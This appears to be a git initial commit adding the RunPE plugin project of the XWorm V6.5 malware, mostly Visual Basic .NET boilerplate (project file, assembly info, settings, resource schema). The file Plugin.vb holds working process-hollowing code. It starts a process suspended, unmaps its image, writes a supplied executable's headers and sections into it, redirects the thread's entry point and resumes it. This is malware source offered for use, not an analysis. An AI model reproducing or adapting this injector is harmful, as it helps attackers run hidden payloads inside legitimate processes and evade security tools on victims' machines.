initial commit
This commit is contained in:
@@ -0,0 +1 @@
|
||||
{"RootPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\PE SRC\\RunPE","ProjectFileName":"RunPE.vbproj","Configuration":"Debug|AnyCPU","FrameworkPath":"","Sources":[{"SourceFile":"Plugin.vb"},{"SourceFile":"My Project\\AssemblyInfo.vb"},{"SourceFile":"My Project\\Application.Designer.vb"},{"SourceFile":"My Project\\Resources.Designer.vb"},{"SourceFile":"My Project\\Settings.Designer.vb"},{"SourceFile":"obj\\Debug\\.NETFramework,Version=v4.8.AssemblyAttributes.vb"}],"References":[{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Core.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.DataSetExtensions.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.Linq.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""}],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\XWorm\\bin\\Debug\\Plugins\\RunPE.dll","OutputItemRelativePath":"RunPE.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}
|
||||
@@ -0,0 +1,13 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
@@ -0,0 +1,10 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
||||
<MySubMain>false</MySubMain>
|
||||
<SingleInstance>false</SingleInstance>
|
||||
<ShutdownMode>0</ShutdownMode>
|
||||
<EnableVisualStyles>true</EnableVisualStyles>
|
||||
<AuthenticationMode>0</AuthenticationMode>
|
||||
<ApplicationType>1</ApplicationType>
|
||||
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
|
||||
</MyApplicationData>
|
||||
@@ -0,0 +1,35 @@
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
Imports System.Runtime.InteropServices
|
||||
|
||||
' General Information about an assembly is controlled through the following
|
||||
' set of attributes. Change these attribute values to modify the information
|
||||
' associated with an assembly.
|
||||
|
||||
' Review the values of the assembly attributes
|
||||
|
||||
<Assembly: AssemblyTitle("RunPE")>
|
||||
<Assembly: AssemblyDescription("")>
|
||||
<Assembly: AssemblyCompany("")>
|
||||
<Assembly: AssemblyProduct("RunPE")>
|
||||
<Assembly: AssemblyCopyright("Copyright © 2021")>
|
||||
<Assembly: AssemblyTrademark("")>
|
||||
|
||||
<Assembly: ComVisible(False)>
|
||||
|
||||
'The following GUID is for the ID of the typelib if this project is exposed to COM
|
||||
<Assembly: Guid("b4859bf8-40f9-46af-88cb-f31cf4765174")>
|
||||
|
||||
' Version information for an assembly consists of the following four values:
|
||||
'
|
||||
' Major Version
|
||||
' Minor Version
|
||||
' Build Number
|
||||
' Revision
|
||||
'
|
||||
' You can specify all the values or you can default the Build and Revision Numbers
|
||||
' by using the '*' as shown below:
|
||||
' <Assembly: AssemblyVersion("1.0.*")>
|
||||
|
||||
<Assembly: AssemblyVersion("1.0.0.0")>
|
||||
<Assembly: AssemblyFileVersion("1.0.0.0")>
|
||||
@@ -0,0 +1,63 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
|
||||
Namespace My.Resources
|
||||
|
||||
'This class was auto-generated by the StronglyTypedResourceBuilder
|
||||
'class via a tool like ResGen or Visual Studio.
|
||||
'To add or remove a member, edit your .ResX file then rerun ResGen
|
||||
'with the /str option, or rebuild your VS project.
|
||||
'''<summary>
|
||||
''' A strongly-typed resource class, for looking up localized strings, etc.
|
||||
'''</summary>
|
||||
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0"), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
|
||||
Friend Module Resources
|
||||
|
||||
Private resourceMan As Global.System.Resources.ResourceManager
|
||||
|
||||
Private resourceCulture As Global.System.Globalization.CultureInfo
|
||||
|
||||
'''<summary>
|
||||
''' Returns the cached ResourceManager instance used by this class.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
|
||||
Get
|
||||
If Object.ReferenceEquals(resourceMan, Nothing) Then
|
||||
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Plugin.Resources", GetType(Resources).Assembly)
|
||||
resourceMan = temp
|
||||
End If
|
||||
Return resourceMan
|
||||
End Get
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Overrides the current thread's CurrentUICulture property for all
|
||||
''' resource lookups using this strongly typed resource class.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend Property Culture() As Global.System.Globalization.CultureInfo
|
||||
Get
|
||||
Return resourceCulture
|
||||
End Get
|
||||
Set
|
||||
resourceCulture = value
|
||||
End Set
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
@@ -0,0 +1,117 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<root>
|
||||
<!--
|
||||
Microsoft ResX Schema
|
||||
|
||||
Version 2.0
|
||||
|
||||
The primary goals of this format is to allow a simple XML format
|
||||
that is mostly human readable. The generation and parsing of the
|
||||
various data types are done through the TypeConverter classes
|
||||
associated with the data types.
|
||||
|
||||
Example:
|
||||
|
||||
... ado.net/XML headers & schema ...
|
||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
||||
<resheader name="version">2.0</resheader>
|
||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
||||
</data>
|
||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
||||
<comment>This is a comment</comment>
|
||||
</data>
|
||||
|
||||
There are any number of "resheader" rows that contain simple
|
||||
name/value pairs.
|
||||
|
||||
Each data row contains a name, and value. The row also contains a
|
||||
type or mimetype. Type corresponds to a .NET class that support
|
||||
text/value conversion through the TypeConverter architecture.
|
||||
Classes that don't support this are serialized and stored with the
|
||||
mimetype set.
|
||||
|
||||
The mimetype is used for serialized objects, and tells the
|
||||
ResXResourceReader how to depersist the object. This is currently not
|
||||
extensible. For a given mimetype the value must be set accordingly:
|
||||
|
||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
||||
that the ResXResourceWriter will generate, however the reader can
|
||||
read any of the formats listed below.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.binary.base64
|
||||
value : The object must be serialized with
|
||||
: System.Serialization.Formatters.Binary.BinaryFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.soap.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
||||
value : The object must be serialized into a byte array
|
||||
: using a System.ComponentModel.TypeConverter
|
||||
: and then encoded with base64 encoding.
|
||||
-->
|
||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
||||
<xsd:element name="root" msdata:IsDataSet="true">
|
||||
<xsd:complexType>
|
||||
<xsd:choice maxOccurs="unbounded">
|
||||
<xsd:element name="metadata">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
<xsd:attribute name="type" type="xsd:string" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="assembly">
|
||||
<xsd:complexType>
|
||||
<xsd:attribute name="alias" type="xsd:string" />
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="data">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
|
||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="resheader">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:choice>
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:schema>
|
||||
<resheader name="resmimetype">
|
||||
<value>text/microsoft-resx</value>
|
||||
</resheader>
|
||||
<resheader name="version">
|
||||
<value>2.0</value>
|
||||
</resheader>
|
||||
<resheader name="reader">
|
||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<resheader name="writer">
|
||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
</root>
|
||||
@@ -0,0 +1,73 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "17.14.0.0"), _
|
||||
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Partial Friend NotInheritable Class MySettings
|
||||
Inherits Global.System.Configuration.ApplicationSettingsBase
|
||||
|
||||
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
|
||||
|
||||
#Region "My.Settings Auto-Save Functionality"
|
||||
#If _MyType = "WindowsForms" Then
|
||||
Private Shared addedHandler As Boolean
|
||||
|
||||
Private Shared addedHandlerLockObject As New Object
|
||||
|
||||
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs)
|
||||
If My.Application.SaveMySettingsOnExit Then
|
||||
My.Settings.Save()
|
||||
End If
|
||||
End Sub
|
||||
#End If
|
||||
#End Region
|
||||
|
||||
Public Shared ReadOnly Property [Default]() As MySettings
|
||||
Get
|
||||
|
||||
#If _MyType = "WindowsForms" Then
|
||||
If Not addedHandler Then
|
||||
SyncLock addedHandlerLockObject
|
||||
If Not addedHandler Then
|
||||
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
|
||||
addedHandler = True
|
||||
End If
|
||||
End SyncLock
|
||||
End If
|
||||
#End If
|
||||
Return defaultInstance
|
||||
End Get
|
||||
End Property
|
||||
End Class
|
||||
End Namespace
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
|
||||
Friend Module MySettingsProperty
|
||||
|
||||
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
|
||||
Friend ReadOnly Property Settings() As Global.Plugin.My.MySettings
|
||||
Get
|
||||
Return Global.Plugin.My.MySettings.Default
|
||||
End Get
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
@@ -0,0 +1,7 @@
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
|
||||
<Profiles>
|
||||
<Profile Name="(Default)" />
|
||||
</Profiles>
|
||||
<Settings />
|
||||
</SettingsFile>
|
||||
@@ -0,0 +1,216 @@
|
||||
Public Class Plugin
|
||||
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="CreateProcess", CharSet:=System.Runtime.InteropServices.CharSet.Unicode), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function CreateProcess_APIOO(
|
||||
ByVal applicationName As String,
|
||||
ByVal commandLine As String,
|
||||
ByVal processAttributes As System.IntPtr,
|
||||
ByVal threadAttributes As System.IntPtr,
|
||||
ByVal inheritHandles As Boolean,
|
||||
ByVal creationFlags As UInteger,
|
||||
ByVal environment As System.IntPtr,
|
||||
ByVal currentDirectory As String,
|
||||
ByRef startupInfo As STARTUP_INFORMATION,
|
||||
ByRef processInformation As PROCESS_INFORMATION) As Boolean
|
||||
End Function 'CreateProcess
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="GetThreadContext"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function GetThreadContext_API(
|
||||
ByVal thread As System.IntPtr,
|
||||
ByVal context As Integer()) As Boolean
|
||||
End Function 'GetThreadContext
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="Wow64GetThreadContext"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function Wow64GetThreadContext_API(
|
||||
ByVal thread As System.IntPtr,
|
||||
ByVal context As Integer()) As Boolean
|
||||
End Function 'Wow64GetThreadContext
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="SetThreadContext"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function SetThreadContext_API(
|
||||
ByVal thread As System.IntPtr,
|
||||
ByVal context As Integer()) As Boolean
|
||||
End Function 'SetThreadContext
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="Wow64SetThreadContext"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function Wow64SetThreadContext_API(
|
||||
ByVal thread As System.IntPtr,
|
||||
ByVal context As Integer()) As Boolean
|
||||
End Function 'Wow64SetThreadContext
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function ReadProcessMemory_API(
|
||||
ByVal process As System.IntPtr,
|
||||
ByVal baseAddress As Integer,
|
||||
ByRef buffer As Integer,
|
||||
ByVal bufferSize As Integer,
|
||||
ByRef bytesRead As Integer) As Boolean
|
||||
End Function 'ReadProcessMemory
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="WriteProcessMemory"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function WriteProcessMemory_API(
|
||||
ByVal process As System.IntPtr,
|
||||
ByVal baseAddress As Integer,
|
||||
ByVal buffer As Byte(),
|
||||
ByVal bufferSize As Integer,
|
||||
ByRef bytesWritten As Integer) As Boolean
|
||||
End Function 'WriteProcessMemory
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("ntdll.dll", EntryPoint:="NtUnmapViewOfSection"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function NtUnmapViewOfSection_API(
|
||||
ByVal process As System.IntPtr,
|
||||
ByVal baseAddress As Integer) As Integer
|
||||
End Function 'NtUnmapViewOfSection
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="VirtualAllocEx"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function VirtualAllocEx_API(
|
||||
ByVal handle As System.IntPtr,
|
||||
ByVal address As Integer,
|
||||
ByVal length As Integer,
|
||||
ByVal type As Integer,
|
||||
ByVal protect As Integer) As Integer
|
||||
End Function 'VirtualAllocEx
|
||||
|
||||
<System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="ResumeThread"), System.Security.SuppressUnmanagedCodeSecurity>
|
||||
Private Shared Function ResumeThread_API(
|
||||
ByVal handle As System.IntPtr) As Integer
|
||||
End Function 'ResumeThread
|
||||
|
||||
<System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack:=1)>
|
||||
Private Structure PROCESS_INFORMATION
|
||||
Public ProcessHandle As System.IntPtr
|
||||
Public ThreadHandle As System.IntPtr
|
||||
Public ProcessId As UInteger
|
||||
Public ThreadId As UInteger
|
||||
End Structure 'PROCESS_INFORMATION
|
||||
|
||||
<System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack:=1)>
|
||||
Private Structure STARTUP_INFORMATION
|
||||
Public Size_ As UInteger
|
||||
Public Reserved1 As String
|
||||
Public Desktop As String
|
||||
Public Title As String
|
||||
|
||||
Public dwX As Integer
|
||||
Public dwY As Integer
|
||||
Public dwXSize As Integer
|
||||
Public dwYSize As Integer
|
||||
Public dwXCountChars As Integer
|
||||
Public dwYCountChars As Integer
|
||||
Public dwFillAttribute As Integer
|
||||
Public dwFlags As Integer
|
||||
Public wShowWindow As Short
|
||||
Public cbReserved2 As Short
|
||||
Public Reserved2 As System.IntPtr
|
||||
Public StdInput As System.IntPtr
|
||||
Public StdOutput As System.IntPtr
|
||||
Public StdError As System.IntPtr
|
||||
End Structure 'STARTUP_INFORMATION
|
||||
|
||||
Public Shared Function injRun(ByVal path As String, ByVal data As Byte()) As Boolean
|
||||
For fri As Integer = 1 To 5
|
||||
If HandleRun(path, data) Then Return True
|
||||
Next
|
||||
Return False
|
||||
End Function 'Run
|
||||
Private Shared Function HandleRun(ByVal path As String, ByVal data As Byte()) As Boolean
|
||||
Dim ReadWrite As Integer
|
||||
Dim QuotedPath As String = String.Format("""{0}""", path)
|
||||
|
||||
Dim SI As New STARTUP_INFORMATION
|
||||
Dim PI As New PROCESS_INFORMATION
|
||||
|
||||
SI.dwFlags = 0 ' dwFlags = 1 ( Hide ) ' dwFlags = 0 ( Show )
|
||||
SI.Size_ = CUInt(System.Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUP_INFORMATION)))
|
||||
|
||||
Try
|
||||
If Not String.IsNullOrEmpty("") Then
|
||||
QuotedPath = QuotedPath & " " & ""
|
||||
End If
|
||||
|
||||
If Not CreateProcess_APIOO(path, QuotedPath, System.IntPtr.Zero, System.IntPtr.Zero, False, 4, System.IntPtr.Zero, Nothing, SI, PI) Then Throw New System.Exception()
|
||||
|
||||
'%Process_Protection% ProtectProcess(PI.ProcessId)
|
||||
|
||||
Dim FileAddress As Integer = System.BitConverter.ToInt32(data, 60)
|
||||
Dim ImageBase As Integer = System.BitConverter.ToInt32(data, FileAddress + 52)
|
||||
|
||||
Dim Context_(179 - 1) As Integer
|
||||
Context_(0) = 65538
|
||||
|
||||
If System.IntPtr.Size = 4 Then
|
||||
If Not GetThreadContext_API(PI.ThreadHandle, Context_) Then Throw New System.Exception()
|
||||
Else
|
||||
If Not Wow64GetThreadContext_API(PI.ThreadHandle, Context_) Then Throw New System.Exception()
|
||||
End If
|
||||
|
||||
Dim Ebx As Integer = Context_(41)
|
||||
Dim BaseAddress As Integer
|
||||
|
||||
If Not ReadProcessMemory_API(PI.ProcessHandle, Ebx + 8, BaseAddress, 4, ReadWrite) Then Throw New System.Exception()
|
||||
|
||||
If ImageBase = BaseAddress Then
|
||||
If Not NtUnmapViewOfSection_API(PI.ProcessHandle, BaseAddress) = 0 Then Throw New System.Exception()
|
||||
End If
|
||||
|
||||
Dim SizeOfImage As Integer = System.BitConverter.ToInt32(data, FileAddress + 80)
|
||||
Dim SizeOfHeaders As Integer = System.BitConverter.ToInt32(data, FileAddress + 84)
|
||||
|
||||
Dim AllowOverride As Boolean
|
||||
Dim NewImageBase As Integer = VirtualAllocEx_API(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64) 'R1
|
||||
|
||||
'This is the only way to execute under certain conditions. However, it may show
|
||||
'an application error probably because things aren't being relocated properly.
|
||||
|
||||
|
||||
|
||||
If NewImageBase = 0 Then Throw New System.Exception()
|
||||
|
||||
If Not WriteProcessMemory_API(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ReadWrite) Then Throw New System.Exception()
|
||||
|
||||
Dim SectionOffset As Integer = FileAddress + 248
|
||||
Dim NumberOfSections As Short = System.BitConverter.ToInt16(data, FileAddress + 6)
|
||||
|
||||
For fri As Integer = 0 To NumberOfSections - 1
|
||||
Dim VirtualAddress As Integer = System.BitConverter.ToInt32(data, SectionOffset + 12)
|
||||
Dim SizeOfRawData As Integer = System.BitConverter.ToInt32(data, SectionOffset + 16)
|
||||
Dim PointerToRawData As Integer = System.BitConverter.ToInt32(data, SectionOffset + 20)
|
||||
|
||||
If Not SizeOfRawData = 0 Then
|
||||
Dim SectionData(SizeOfRawData - 1) As Byte
|
||||
Array.Copy(data, PointerToRawData, SectionData, 0, SectionData.Length)
|
||||
|
||||
If Not WriteProcessMemory_API(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New System.Exception()
|
||||
End If
|
||||
|
||||
SectionOffset += 40
|
||||
Next
|
||||
|
||||
Dim PointerData As Byte() = System.BitConverter.GetBytes(NewImageBase)
|
||||
If Not WriteProcessMemory_API(PI.ProcessHandle, Ebx + 8, PointerData, 4, ReadWrite) Then Throw New System.Exception()
|
||||
|
||||
Dim AddressOfEntryPoint As Integer = System.BitConverter.ToInt32(data, FileAddress + 40)
|
||||
|
||||
If AllowOverride Then NewImageBase = ImageBase
|
||||
Context_(44) = NewImageBase + AddressOfEntryPoint
|
||||
|
||||
If System.IntPtr.Size = 4 Then
|
||||
If Not SetThreadContext_API(PI.ThreadHandle, Context_) Then Throw New System.Exception()
|
||||
Else
|
||||
If Not Wow64SetThreadContext_API(PI.ThreadHandle, Context_) Then Throw New System.Exception()
|
||||
End If
|
||||
|
||||
If ResumeThread_API(PI.ThreadHandle) = -1 Then Throw New System.Exception()
|
||||
Catch
|
||||
Dim Pros As System.Diagnostics.Process = System.Diagnostics.Process.GetProcessById(CInt(PI.ProcessId))
|
||||
If Pros IsNot Nothing Then Pros.Kill()
|
||||
|
||||
Return False
|
||||
|
||||
|
||||
End Try
|
||||
|
||||
Return True
|
||||
End Function 'HandleRun
|
||||
End Class ' RunPE
|
||||
@@ -0,0 +1,115 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{FCE6038E-F460-4711-8C4E-E0D298D871B1}</ProjectGuid>
|
||||
<OutputType>Library</OutputType>
|
||||
<RootNamespace>Plugin</RootNamespace>
|
||||
<AssemblyName>RunPE</AssemblyName>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<MyType>Windows</MyType>
|
||||
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
|
||||
<TargetFrameworkProfile />
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<DebugSymbols>false</DebugSymbols>
|
||||
<DebugType>none</DebugType>
|
||||
<DefineDebug>true</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<OutputPath>..\..\..\XWorm\bin\Debug\Plugins\</OutputPath>
|
||||
<DocumentationFile>
|
||||
</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
<Prefer32Bit>false</Prefer32Bit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<DefineDebug>false</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>..\..\..\XWorm\bin\Debug\Plugins\</OutputPath>
|
||||
<DocumentationFile>
|
||||
</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
<Prefer32Bit>false</Prefer32Bit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionExplicit>On</OptionExplicit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionCompare>Binary</OptionCompare>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionStrict>Off</OptionStrict>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionInfer>On</OptionInfer>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Xml" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="System.Data.DataSetExtensions" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Import Include="Microsoft.VisualBasic" />
|
||||
<Import Include="System" />
|
||||
<Import Include="System.Collections" />
|
||||
<Import Include="System.Collections.Generic" />
|
||||
<Import Include="System.Data" />
|
||||
<Import Include="System.Diagnostics" />
|
||||
<Import Include="System.Linq" />
|
||||
<Import Include="System.Xml.Linq" />
|
||||
<Import Include="System.Threading.Tasks" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="Plugin.vb" />
|
||||
